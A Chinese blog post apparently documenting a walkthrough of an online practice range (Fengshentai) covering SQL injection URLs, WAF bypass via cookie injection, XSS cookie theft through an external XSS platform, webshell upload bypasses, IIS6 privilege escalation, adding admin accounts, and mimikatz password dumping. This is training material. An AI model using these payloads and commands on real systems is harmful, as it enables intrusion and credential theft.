封神台在线靶场--尤里的复仇Ⅰ 小芳!【8题】

最新推荐文章于 2024-05-07 22:30:09 发布
最新推荐文章于 2024-05-07 22:30:09 发布
阅读量9.2k 收藏 26
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120847903
版权

尤里的复仇Ⅰ 小芳!【8题】


封神台-掌控安全在线演练靶场

第一章:为了女神小芳!

没有防护的sql注入,查看到有sql注入点
http://rhiq8003.ia.aqlab.cn/?id=1 or 1=1
在这里插入图片描述通过测试,此payload适合注入,查看字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 2
在这里插入图片描述发现字段数位2
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=1 order by 3
在这里插入图片描述查看数据库和用户名,并得知显示第二个字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select user(),database()
在这里插入图片描述查表
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema='maoshe'
在这里插入图片描述查字段
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin'
在这里插入图片描述因为只显示一个字段,故可用limit达到输出第1,2,3个数据等
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' limit 1,1
在这里插入图片描述查到第三个数据的字段位password
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name='admin' limit 2,1
在这里插入图片描述查字段的内容,得到flag
http://rhiq8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin
在这里插入图片描述

第二章:遇到阻难!绕过WAF过滤!

当点击新闻时,会出现?id=,测试发现注入点

http://kypt8004.ia.aqlab.cn/shownews.asp?id=169 order by 10
在这里插入图片描述发现有10个字段
http://kypt8004.ia.aqlab.cn/shownews.asp?id=169 order by 11
在这里插入图片描述很多sql语句被黑名单限制
在这里插入图片描述尝试之后发现可用使用cookie注入,有注入点
在这里插入图片描述尝试union select 1,2,3,4,5,6,7,8,9,10提示数据库出错,再尝试猜测字段admin是否在库中,union select 1,2,3,4,5,6,7,8,9,10 from admin,正确回显了可显示的字段:2.7.8.9
在这里插入图片描述在可显示的字段位数上查询admin表里是否存在usernamepassword,结果显示了存在username和password
在这里插入图片描述用MD5解密passsword

再御剑扫出后台
在这里插入图片描述
在这里插入图片描述登录后台登录系统
在这里插入图片描述

第三章:为了更多的权限!留言板!

使用xss平台(https://xss8.cc),接收到管理员的cookie
首先创建一个项目

在这里插入图片描述勾选这两个选项

在这里插入图片描述将下面的代码复制到存在xss漏洞的地方
在这里插入图片描述在这里插入图片描述在到平台查看结果,得到cookie,里面存在flag

在这里插入图片描述

第四章:进击!拿到Web最高权限!

将此cookie复制到下面的登录页面
在这里插入图片描述
使用后台管理者的cookie直接登录到后台
在这里插入图片描述
找到上传webshell的位置
在这里插入图片描述上传1.asp,被拦截
在这里插入图片描述
将1.asp与图片合成一张新的图片,变成2.gif在这里插入图片描述
将2.gif改为2.cer再上传

在这里插入图片描述用蚁剑连接
在这里插入图片描述得到flag
在这里插入图片描述

第五章:SYSTEM!POWER!

我使用蚁剑会出错,之后就换成菜刀了

iis6.exe提权是利用iis6.0远程代码执行漏洞获取到一个webshell之后,进行的提权操作

这里没有使用cmd和iis.exe,没有查看权限
在这里插入图片描述

将cmd.exe和iis6.exe上传,这里已经有人上传过了,直接拿来用iis6.exe
在这里插入图片描述

这里使用了cmd,没有使用iis.exe,是普通权限
在这里插入图片描述
使用iis.exe提权,得到系统权限
在这里插入图片描述
添加新用户
在这里插入图片描述将用户添加到Administrator组里
在这里插入图片描述tasklist -svc查看远程服务的进程号了,2444为远程服务的进程号
在这里插入图片描述之后根据进程号查看开启的端口时多时
netstat查看端口号,开启了3389,可进行远程连接
(这两个步骤验证远程连接的端口号)

ping 域名可查看到ip
在这里插入图片描述ip+端口号
在这里插入图片描述

连接到目标主机,查看到flag
在这里插入图片描述

第六章:GET THE PASS!

发现压缩包没有查看权限,可更改权限
在这里插入图片描述将拒绝上面的勾全部取消
在这里插入图片描述

发现查看需要管理员的登录密码
在这里插入图片描述

使用mimikatz抓取密码
privilege::debug,提升权限
sekurlsa::logonpasswords导出明文密码,得到密码:wow!yougotit!
在这里插入图片描述

访问文件,得到flag

在这里插入图片描述

萌新也能找CMS漏洞

方法一:

在更改信息时,上传1.php,将content-type类型改为图片类型image/jpeg
在这里插入图片描述
上传成功
在这里插入图片描述指向图片,复制图片 地址
在这里插入图片描述用菜刀连接,得到flag
在这里插入图片描述在这里插入图片描述

不过flag不对,提交显示错误,(还有其他方法)

方法二:
源代码审计
在ad_js.php里面传入的ad_id参数并没有过滤sql注入的相关字符,故可从此注入
在这里插入图片描述查字段为7个字段
在这里插入图片描述在这里插入图片描述只有字段7显示内容
ming在这里插入图片描述查库
在这里插入图片描述

查表,这里转义了',变成了\',故可以使用0x626c75655f74657374(用16进制时,不需要加引号,并且前面需加0x)代替'blue_test'
在这里插入图片描述

查字段
在这里插入图片描述在这里插入图片描述
查字段内容,得到用户名与密码,密码需md5解密
在这里插入图片描述
在这里插入图片描述

下面网址的报错注入,我没有测试,你们可以测试一下
在这里插入图片描述在这里插入图片描述

基础工具运用:爆破管理员账户登录后台

找到后台登录页面
http://rhiq8003.ia.aqlab.cn/dami_777/dami_888/admin.php在这里插入图片描述
开始爆破
在这里插入图片描述登录得到flag
在这里插入图片描述

F。N 嘿嘿
关注
  • 7
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解思路...
weixin_42442653的博客
08-06 1085
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
1333199-pognali-22:尤里·莱特
04-06
个人项目“驾驶” 学生: 。 导师: Неизвестно 。 请注意,您的源文件文件夹为source/ 。 有用的文件: 进行更改的指南。 不要删除或注意文件: .editorconfig , .gitattributes , .gitignore , ....
注入(一)
tomyyyyy
06-28 277
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
19个练习黑客技术的在线网站
CSDN_430422的博客
05-07 791
以下网站希望能给各位安全小伙伴带来帮助!(排名不分 先后)
神台——第一:为了女神小芳
分享简单的安全技术
01-17 694
目:获取数据库管理员密码 目传送阵 渗透步骤        第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。        第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基
神台-靶场-第一章:为了女神小芳!(解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1565
我们先来学习sql注入,
2019网络空间竞赛 Misc writeup 神台 - 掌控安全在线靶场
Senimo
10-29 2032
2019网络空间竞赛 Misc writeup 神台 - 掌控安全在线靶场编码编码与密码拥有渗透测试思维 编码 Rank: 5 Tips: key形式为flag{} flag和括号都要提交。 %e7%ac%ac%e4%b8%80%e5%85%b3%e7%9a%84key%e6%98%afflag%7bwelcome%7d 判断给出的为URL编码,在线URL解码得到:第一关的key是flag{we...
神台-SQL注入实战靶场1-4过程
qq_43367379的博客
05-19 1027
背景 这是最基本的显错注入 已经给出SQL查询语句 select * from user where id=1 不需要先去判断是字符型还是数字型,去一步一步测出sql查询语句了 废话不多说,直接上解步骤 1.在url地址栏上 ?id=1 后面拼接 order by 3 说明: 所有操作都是在地址栏上拼接字符串实现的,没有借助工具 https://...?id=1 order by 3 结果为 正确显示 当前用户的账号和密码 2.在url地址栏上 ?id=1 后面拼接 order by 4 https://
局域网对战玩红警红色警戒--尤里复仇.pdf
11-06
局域网对战玩红警红色警戒--尤里复仇.pdf
尤里复仇WIN10全屏切换不黑屏补丁
07-29
尤里复仇WIN10全屏切换不黑屏补丁》是针对经典即时战略游戏《红色警戒2:尤里复仇》在Windows 10操作系统上运行时出现的全屏切换黑屏问而设计的一款补丁。这款补丁解决了许多玩家在尝试全屏游戏时遭遇的困扰,...
yuri-nodebb:尤里·诺德伯
05-20
请注意,这不是一个完整的插件,而仅仅是一个骨架,您可以使用它为NodeBB创建自己的OAuth SSO插件(并希望与他人共享!)如何适应分叉此插件 添加OAuth凭据(在library.js第30行附近) 使用用户API调用中的信息更新...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
80269-sedona:尤里·库伦科夫(Yuri Kurenkov)
04-30
塞多纳项目 学生: 。 导师: 。 关于你自己的一点 您是否参加过基本HTML和CSS在线强化课程? 是的,成功 -- 不要删除或注意以下文件: .gosha , .... 该存储库的创建是为了接受来自的密集在线课程“ ”的。
神台靶场-第二章
Mr_helloword的博客
07-12 2983
第二章:遇到阻难!绕过WAF过滤 1.查有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过: 这里我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
神台靶场-第三章
Mr_helloword的博客
07-12 2260
第三章:爆破管理员账户登录后台 使用工具:御剑后台扫描,burpsuit 进入网站后想进入管理后台页面,试着在url地址后加/admin常试结果成功了,如果不成功再用工具扫描如下: 登陆后台后使用bp暴力破解模块爆破账户密码(这里我们知道账号密码就不具体演示了): 3.使用bp修改数量价格 flag ...
神台——高校靶场ctf——第一期Web web_001
m0_52738557的博客
06-21 329
难度:⭐ 首先点击传送门打开相应的目可以看到 这样一个画面,一个链接不到的反应,但目以及告诉,F12就完事。 显然答案没有在这直接显示,再看看网络监视器查看传输中有没有什么线索可以看到flag出现了,但这是错误的答案,再通过源码看看数据包中有没有其他线索 可疑目标出现,有一个js文件我们点开得到一串提示, fromCharCode() 通过指定 Unicode 值,得到一个字符串 我们可以通过html的代码进行解析,在 菜鸟教程在线编辑器-fromCharCode() 中进行解析 将要转换的数据输入
掌控者-神台靶场-萌新也能CMS漏洞
为了低调的博客
09-15 561
这个靶场压根没有flag有的话也是错误的,因为你可以看到通关的人数,从始至终都是那一个人a通关了,在这个靶场我们可以有挺多漏洞,所以只要你发现漏洞了你就可以给你自己一个大拇指赞一下了那个flag压根不到。由于自己懒一点这里就不写教程了都是一些很简单的漏洞大家可以尝试一下!
神台 - 掌控安全靶场尤里复仇小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场尤里复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
尤里复仇小芳
sparename的博客
08-22 253
尤里复仇小芳!第一章:为了女神小芳!第二章:遇到阻难!绕过WAF过滤!测试是否有注入点,弹框提示过滤了很多关键字绕过WAF关键字过滤 第一章:为了女神小芳! SQL注入,判断字段数,判断回显点 这道可以用exists函数猜测表单 and exists(select * from admin)#猜测有admin表单 http://59.63.200.79:8003/?id=1%20and%20exists(select%20*%20from%20admin) 继续猜是否有user,password
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xba in position 13: invalid start byte
最新发布
05-20
这个错误通常出现在Python中,它表示Python解释器在尝试使用UTF-8编码解码一个字符串时出现了错误。具体来说,这个错误通常是由于字符串中包含了无效的字节序列而导致的。 解决这个问的方法是尝试使用其他编码方式来解码字符串,或者在读取文件时指定正确的编码方式。此外,也可以尝试删除字符串中的无效字节,或者对字符串进行适当的处理。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值